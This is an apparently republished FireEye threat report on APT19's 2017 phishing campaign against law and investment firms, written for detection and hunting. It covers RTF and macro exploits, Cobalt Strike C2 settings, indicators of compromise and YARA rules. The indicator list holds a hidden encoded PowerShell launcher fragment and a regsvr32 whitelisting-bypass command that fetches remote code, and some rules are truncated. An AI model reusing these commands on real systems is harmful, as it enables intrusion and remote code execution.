This post was originally published on this site is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to


In May and June 2017, FireEye observed a phishing campaign targeting
at least seven global law and investment firms. We have associated
this campaign with APT19, a group that we assess is composed of
freelancers, with some degree of sponsorship by the Chinese government.

APT19 used three different techniques to attempt to compromise
targets. In early May, the phishing lures leveraged RTF attachments
that exploited the Microsoft Windows vulnerability described in CVE
. Toward the end of May, APT19 switched to using
macro-enabled Microsoft Excel (XLSM) documents. In the most recent
versions, APT19 added an application whitelisting bypass to the XLSM
documents. At least one observed phishing lure delivered a Cobalt
Strike payload.

As of the writing of this blog post, FireEye had not observed
post-exploitation activity by the threat actors, so we cannot assess
the goal of the campaign. We have previously observed APT19 steal data
from law and investment firms for competitive economic purposes.

This purpose of this blog post is to inform law firms and investment
firms of this phishing campaign and provide technical indicators that
their IT personnel can use for proactive hunting and detection.

The Emails

APT19 phishing emails from this campaign originated from sender
email accounts from the “@cloudsend[.]net” domain and used a
variety of subjects and attachment names. Refer to the Indicators of
Compromise section for more details.

The Attachments

APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft
Excel (XLSM) files to deliver their initial exploits. The following
sections describe the two methods in further detail.

RTF Attachments

Through the exploitation of the HTA handler vulnerability described
in CVE-2017-1099,
the observed RTF attachments download
hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file
was no longer hosted at tk-in-f156.2bunny[.]com for further analysis.
Figure 1 is a screenshot of a packet capture showing one of the RTF
files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.

Figure 1: RTF PCAP

XLSM Attachments

The XLSM attachments contained multiple worksheets with content that
reflected the attachment name. The attachments also contained an image
that requested the user to “Enable Content”, which would enable macro
support if it was disabled. Figure 2 provides a screenshot of one of
the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7).

Figure 2: Enable macros

One of the malicious XLSM attachments that we observed contained a
macro that:

  1. Determined the system architecture to select the correct path
    for PowerShell
  2. Launched a ZLIB compressed and Base64
    encoded command with PowerShell. This is a typical technique used by
    Meterpreter stagers.

Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).

Figure 3: XLSX Macro

Figure 4 contains the decoded output of the encoded text.

Figure 4: Decoded ZLIB + Base64 payload

The shellcode invokes PowerShell to issue a HTTP GET request for a
random four (4) character URI on the root of
autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP
headers since the PowerShell command is executed with mostly default
parameters. Figure 5 depicts an HTTP GET request generated by the
payload, with minimal HTTP headers.

Figure 5: GET Request with minimal HTTP headers

Converting the shellcode to ASCII and removing the non-printable
characters provides a quick way to pull out network-based indicators
(NBI) from the shellcode. Figure 6 shows the extracted NBIs.

Figure 6: Decoded shellcode

FireEye also identified an alternate macro in some of the XLSM
documents, displayed in Figure 7.

Figure 7: Alternate macro

This macro uses Casey
Smith’s “Squiblydoo” Application Whitelisting bypass
to run the command in Figure 8.

Figure 8: Application Whitelisting Bypass

The command in Figure 8 downloads and launches code within an SCT
file. The SCT file in the payload (MD5:
1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.

Figure 9: SCT contents

Figure 10 provides the decoded script. Notice the “$DoIt” string,
which is usually indicative of a Cobalt Strike payload.

Figure 10: Decoded SCT contents

A quick conversion of the contents of the variable “$var_code” from
Base64 to ASCII shows some familiar network indicators, shown in
Figure 11.

Figure 11: $var_code to ASCII

Second Stage Payload

Once the XLSM launches its PowerShell command, it downloads a
typical Cobalt Strike BEACON payload, configured with the following parameters:

  • Process Inject Targets:
    • %windir%syswow64rundll32.exe
    • %windir%sysnativerundll32.exe
  • c2_user_agents
    • Mozilla/5.0 (compatible; MSIE 9.0;
      Windows NT 6.1; Trident/5.0; FunWebProducts;
  • Named Pipes
    • %spipemsagent_%x
  • beacon_interval
    • 60
  • C2
    • autodiscover.2bunny[.]com/submit.php
    • autodiscover.2bunny[.]com/IE9CompatViewList.xml
    • sfo02s01-in-f2.cloudsend[.]net/submit.php
    • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • C2 Port
    • TCP/80

Figure 12 depicts an example of a BEACON C2 attempt from this payload.

Figure 12: Cobalt Strike BEACON C2

FireEye Product Detections

The following FireEye products currently detect and block the
methods described above. Table 1 lists the current detection and
blocking capabilities by product.

Detection Name







XSLM Macro launch




XSLM Macro launch

Malware Object



BEACON written to disk




BEACON Callback

















Table 1: Detection review

*Appliances must be configured for block mode.


FireEye recommends organizations perform the following steps to
mitigate the risk of this campaign:

  1. Microsoft Office users should apply the patch
    from Microsoft
    as soon as possible, if they have not already
    installed it.
  2. Search historic and future emails that match
    the included indicators of compromise.
  3. Review web proxy
    logs for connections to the included network based indicators of
  4. Block connections to the included fully qualified
    domain names.
  5. Review endpoints for the included host based
    indicators of compromise.

Indicators of Compromise

The following section provides the IOCs for the variants of the
phishing emails and malicious payloads that FireEye has observed
during this campaign.

Email Senders
  • PressReader <infodept@cloudsend[.]net>
  • Angela
    Suh <angela.suh@cloudsend[.]net>
  • Ashley Safronoff
  • Lindsey Hersh
  • Sarah Roberto
  • noreply@cloudsend[.]net
Email Subject Lines
  • Macron Denies Authenticity Of Leak, French Prosecutors Open
  • Macron Document Leaker Releases New Images, Promises
    More Information
  • Are Emmanuel Macron’s Tax Evasion
    Documents Real?
  • Time Allocation
  • Vacancy
  • china paper table and graph
  • results with
    zeros – some ready not all finished
  • Macron Leaks contain
    secret plans for the islamisation of France and Europe
Attachment Names
  • Macron_Authenticity.doc.rtf
  • Macron_Information.doc.rtf
  • US and EU Trade with China and
    China CA.xlsm
  • Tables 4 5 7 Appendix with zeros.xlsm
  • Project Codes – 05.30.17.xlsm
  • Weekly Vacancy Status
    Report 5-30-15.xlsm
  • Macron_Tax_Evasion.doc.rtf
  • Macron_secret_plans.doc.rtf
Network Based Indicators (NBI)
  • lyncdiscover.2bunny[.]com
  • autodiscover.2bunny[.]com
  • lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
  • lyncdiscover.2bunny[.]com/Autodiscover
  • autodiscover.2bunny[.]com/K5om
  • sfo02s01-in-f2.cloudsend[.]net/submit.php
  • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • tk-in-f156.2bunny[.]com
  • tk-in-f156.2bunny[.]com/Agreement.doc
  • 104.236.77[.]169
  • 138.68.45[.]9
  • 162.243.143[.]145
  • Mozilla/5.0 (compatible; MSIE 9.0;
    Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
  • tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)
Host Based Indicators (HBI)

RTF MD5 hash values

  • 0bef39d0e10b1edfe77617f494d733a8
  • 0e6da59f10e1c4685bb5b35a30fc8fb6
  • cebd0e9e05749665d893e78c452607e2

XLSX MD5 hash values

  • 38125a991efc6ab02f7134db0ebe21b6
  • 3a1dca21bfe72368f2dd46eb4d9b48c4
  • 30f149479c02b741e897cdb9ecd22da7

BEACON and Meterpreter payload MD5 hash values

  • bae0b39197a1ac9e24bdf9a9483b18ea
  • 1151619d06a461456b310096db6bc548

Process arguments, named pipes, and file paths

  • powershell.exe -NoP -NonI -W Hidden -Command
    “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object
    IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
  • regsvr32.exe /s /n /u
    /i:hxxps:// scrobj.dll
  • <ip>pipemsagent_<4 digits>
  • C:Documents
    and Settings<user>Local SettingsTempK5om.dll (4 character
    DLL based on URI of original GET request)
Yara Rules

 author=” @TekDefense”
 description=”This rule is designed to identify macros
with the specific encoding used in the sample
       $ob1 = “ChrW(114) &
ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118)
& ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46)
& ChrW(101)” ascii wide
       $ob2 =
“ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47)
& ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110)
& ChrW(32) & ChrW(47)” ascii wide
 $ob3 = “ChrW(117) & ChrW(32) & ChrW(47) &
ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) &
ChrW(116) & ChrW(112) & ChrW(115)” ascii
       $ob4 = “ChrW(58) & ChrW(47) &
ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) &
ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)”
ascii wide
       $ob5 = “ChrW(99) & ChrW(111)
& ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46)
& ChrW(50) & ChrW(98) & ChrW(117) &
ChrW(110)” ascii wide
       $ob6 = “ChrW(110)
& ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111)
& ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117)
& ChrW(116)” ascii wide
       $ob7 =
“ChrW(111) & ChrW(100) & ChrW(105) &
ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) &
ChrW(101) & ChrW(114) & ChrW(32)” ascii
       $ob8 = “ChrW(115) & ChrW(99) &
ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) &
ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)”
ascii wide
       $obreg1 =
       $obreg2 =
       // wscript
       $wsobj1 = “Set Obj =
CreateObject(“WScript.Shell”)” ascii
       $wsobj2 = “Obj.Run ” ascii

                      (uint16(0) != 0x5A4D)
                      all of ($wsobj*) and 3 of
    all of ($wsobj*) and all of ($obreg*)


 author=” @TekDefense”
rule was written to hit on specific variables and powershell
command fragments as seen in the macro found in the XLSX
       // Setting the environment
       $env1 =
ascii wide
       $env2 = “windir =
Environ(“windir”)” ascii wide
 $env3 = “windir +
ascii wide
       // powershell command fragments
     $ps1 = “-NoP” ascii wide
       $ps2 =
“-NonI” ascii wide
       $ps3 = “-W
Hidden” ascii wide
       $ps4 = “-Command”
ascii wide
       $ps5 = “New-Object
IO.StreamReader” ascii wide
       $ps6 =
“IO.Compression.DeflateStream” ascii wide
 $ps7 = “IO.MemoryStream” ascii wide
= “,$([Convert]::FromBase64String” ascii wide
     $ps9 = “ReadToEnd();” ascii wide
 $psregex1 = /Ww+s+s”.+”/
(uint16(0) != 0x5A4D)
                      all of
($env*) and 6 of ($ps*)
                  all of ($env*) and 4 of ($ps*) and all of


description=”Rtf Phishing Campaign leveraging the CVE
2017-0199 exploit, to point to the domain

        $header =

        $lnkinfo =

$encoded1 = “4f4c45324c696e6b”
$encoded2 =
  $encoded3 = “4f0062006a0049006e0066006f”
    $encoded4 = “4f006c0065”

        $http1 =
        $http2 = “74{“
      $http3 = “07{“

        $domain1 = “32{“
      $domain2 = “62{“
        $domain3 =
        $domain4 =
        $domain5 =
        $domain6 =
        $domain7 =
        $domain8 =
        $domain9 =

        $datastore =

$header at 0 and all of them


Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms,
Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer

At L Technology Group, we know technology alone will not protect us from the risks associated with in cyberspace. Hackers, Nation States like Russia and China along with “Bob” in HR opening that email, are all real threats to your organization. Defending against these threats requires a new strategy that incorporates not only technology, but also intelligent personnel who, eats and breaths cybersecurity. Together with proven processes and techniques combines for an advanced next-generation security solution. Since 2008 L Technology Group has develop people, processes and technology to combat the ever changing threat landscape that businesses face day to day.

Call Toll Free (855) 999-6425 for a FREE Consultation from L Technology Group,